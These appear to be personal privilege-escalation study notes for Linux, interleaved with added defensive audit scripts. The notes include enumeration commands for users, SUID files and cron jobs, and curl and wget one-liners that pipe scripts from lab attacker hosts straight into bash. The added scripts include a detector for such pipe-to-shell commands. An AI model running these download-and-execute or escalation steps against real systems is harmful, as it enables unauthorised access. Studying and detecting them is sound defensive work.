Linux

Monday, August 17, 2020

3:14 PM


Enumeration Guides

Basic Linux Privilege Escalation - g0tmi1k

https://gtfobins.github.io/gtfobins/docker/

Manual Enumeration

What is the OS? What version? What architecture? What kernel?

uname -i; cat /etc/*-release; uname -a

Who are we? Where are we?

id; pwd

What users are on this box, and which ones of those have a valid shell?

cat /etc/passwd; echo ''; grep -vE "nologin|false" /etc/passwd
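The two questions above can be answered from the passwd file alone. The script below is an added example, not part of the original notes: it takes passwd-format text as an argument (so it can be run against a constructed sample rather than the live /etc/passwd), lists accounts whose shell allows a login, and additionally flags any account other than root that carries UID 0, which is the sort of entry a reviewer of this output should notice first. The sample accounts are constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original notes): parse passwd-format text and
# report accounts that can log in interactively, plus any account other than
# "root" that carries UID 0. Input is passed as text so the functions can be
# exercised on a constructed sample instead of the live /etc/passwd.

# Constructed sample passwd content for demonstration.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
backup:x:34:34:backup:/var/backups:/bin/false
toor:x:0:0:second root:/root:/bin/sh'

# Print "user:shell" for every account whose shell is not a known no-login shell.
login_accounts() {
    printf '%s\n' "$1" | awk -F: '
        $7 !~ /(nologin|false|sync|halt|shutdown)$/ { print $1 ":" $7 }'
}

# Print every UID 0 account whose name is not root (a classic backdoor sign).
extra_uid0_accounts() {
    printf '%s\n' "$1" | awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

echo "Accounts with an interactive shell:"
login_accounts "$SAMPLE_PASSWD"
echo "Accounts with UID 0 other than root:"
extra_uid0_accounts "$SAMPLE_PASSWD"
```

To run it against a real host, pass "$(cat /etc/passwd)" instead of the sample. The shell filter is a denylist of the usual no-login shells, so an unusual shell path still shows up rather than being silently dropped.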

What is currently running on the box? What active network services are there?

ps aux; echo ''; netstat -antup

What packages are installed? Debian:

dpkg -l

CentOS/openSUSE:

rpm -qa

Living Off The Land

I can execute scripts hosted remotely without having to save the file locally by piping the download straight into bash. See https://stackoverflow.com/questions/5735666/execute-bash-script-from-url.

curl -s http://10.10.14.21/linux_smart_enum.sh | bash /dev/stdin -l 1

Or use wget, which is more commonly installed on servers than curl.

wget -O - http://192.168.49.95/script.sh | bash
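The same "download and pipe into a shell" pattern the two commands above use is easy to spot in a command record. The script below is an added example, not part of the original notes: it scans shell-history or EXECVE-style command lines for curl or wget output piped into an interpreter, which is the check a defender would run over collected history or auditd exports. The sample lines are constructed, and the 203.0.113.5 address is a documentation-range placeholder.

```shell
#!/bin/sh
# Added example (not from the original notes): flag "download and pipe straight
# into a shell" command lines in a command log such as a shell history or an
# auditd/EXECVE-style export. The sample lines below are constructed.

SAMPLE_HISTORY='ls -la /var/www
curl -s http://203.0.113.5/linux_smart_enum.sh | bash /dev/stdin -l 1
wget -O - http://203.0.113.5/script.sh | bash
curl -sSL https://example.invalid/installer.sh -o installer.sh
cat /etc/crontab
wget -qO- http://203.0.113.5/x | sh
python3 -m http.server 8000'

# Print each line where curl/wget output is piped into sh, bash, dash or zsh.
flag_pipe_to_shell() {
    printf '%s\n' "$1" \
        | grep -E '(curl|wget)[^|]*\|[[:space:]]*(ba|z|da)?sh([[:space:]]|$)'
}

echo "Download-and-execute command lines:"
flag_pipe_to_shell "$SAMPLE_HISTORY"
```

A download that is saved to disk first (the installer.sh line) is deliberately not flagged: it leaves a file to inspect, so it is a different, lower-severity finding than a pipe that executes without ever touching disk.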

Kernel Exploits

SUID-bit

find / -user root -perm -4000 -print 2>/dev/null

find / -perm -u=s -type f 2>/dev/null

find / -user root -perm -4000 -exec ls -ldb {} \;
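The find commands above produce the list of SUID files; what matters on a managed host is how that list changes. The script below is an added example, not part of the original notes: it compares the SUID paths found now against a baseline recorded earlier and prints whatever is new, since a SUID file that appears after the baseline was taken is the thing to investigate. Both lists are constructed samples; on a real host the baseline would come from one of the find commands above, saved at build time.

```shell
#!/bin/sh
# Added example (not from the original notes): compare the SUID files found
# now with a baseline recorded earlier and report anything new. Both lists
# are constructed samples. On a live host the baseline would be saved with
#   find / -perm -u=s -type f 2>/dev/null > suid-baseline.txt
# and the current list produced the same way at check time.

BASELINE_SUID='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/mount
/usr/bin/umount'

CURRENT_SUID='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su
/usr/bin/mount
/usr/bin/umount
/tmp/.cache/bash
/usr/local/bin/helper'

# Print paths present in the current list but absent from the baseline.
# Each current path is matched as a whole fixed string (-x -F) so that
# "/usr/bin/su" does not match "/usr/bin/sudo".
new_suid_files() {
    baseline="$1"
    current="$2"
    printf '%s\n' "$current" | sort -u | while IFS= read -r path; do
        printf '%s\n' "$baseline" | grep -qxF -- "$path" || printf '%s\n' "$path"
    done
}

echo "SUID files not in the baseline:"
new_suid_files "$BASELINE_SUID" "$CURRENT_SUID"
```

The comparison is by path only; pairing it with a hash of each baseline binary would also catch an existing SUID binary being replaced, which this check alone cannot see.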

Crontab jobs

I can check the system-wide crontab with:

cat /etc/crontab
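Reading /etc/crontab by eye works for a short file, but the question a hardening audit actually asks is whether any job root runs points at a file other users can modify. The script below is an added example, not part of the original notes: it parses a system crontab (the seven-field format with a user column), keeps only root jobs, and reports those whose command file is world-writable. The crontab and the scripts it references are constructed in a temporary directory so the example runs stand-alone.

```shell
#!/bin/sh
# Added example (not from the original notes): parse a system crontab and
# report root-run jobs whose command file is writable by other users. The
# crontab and scripts are constructed in a temporary directory for the demo.

DEMO_DIR=$(mktemp -d)
trap 'rm -rf "$DEMO_DIR"' EXIT
mkdir -p "$DEMO_DIR/opt" "$DEMO_DIR/usr/local/bin"
printf '#!/bin/sh\necho ok\n' > "$DEMO_DIR/opt/cleanup.sh"
printf '#!/bin/sh\necho ok\n' > "$DEMO_DIR/usr/local/bin/backup.sh"
chmod 777 "$DEMO_DIR/opt/cleanup.sh"           # world-writable: should be flagged
chmod 755 "$DEMO_DIR/usr/local/bin/backup.sh"  # not writable by others: fine

# Constructed system crontab (same layout as /etc/crontab, with a user column).
cat > "$DEMO_DIR/crontab" <<EOF
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 *   * * *   root    $DEMO_DIR/opt/cleanup.sh
0 3     * * *   root    $DEMO_DIR/usr/local/bin/backup.sh --full
0 4     * * *   alice   $DEMO_DIR/opt/cleanup.sh
EOF

# Print "user path" for each root job whose command file is world-writable.
audit_crontab() {
    # Skip comments, blank lines and VAR=value environment lines.
    grep -vE '^[[:space:]]*(#|$|[A-Za-z_]+=)' "$1" \
    | while read -r min hr dom mon dow user cmd; do
        [ "$user" = root ] || continue
        exe=${cmd%% *}                   # first word of the command field
        [ -f "$exe" ] || continue        # skip shell built-ins such as "cd"
        if [ -n "$(find "$exe" -perm -002 2>/dev/null)" ]; then
            printf '%s %s\n' "$user" "$exe"
        fi
    done
}

echo "Root cron jobs running from world-writable files:"
audit_crontab "$DEMO_DIR/crontab"
```

Run it as audit_crontab /etc/crontab on a real host. It only inspects the first word of each command, so a job whose writable script is invoked via "sh /path/script.sh" or from a world-writable directory on PATH would need a second pass that resolves the interpreter's argument and each directory on the crontab's PATH line.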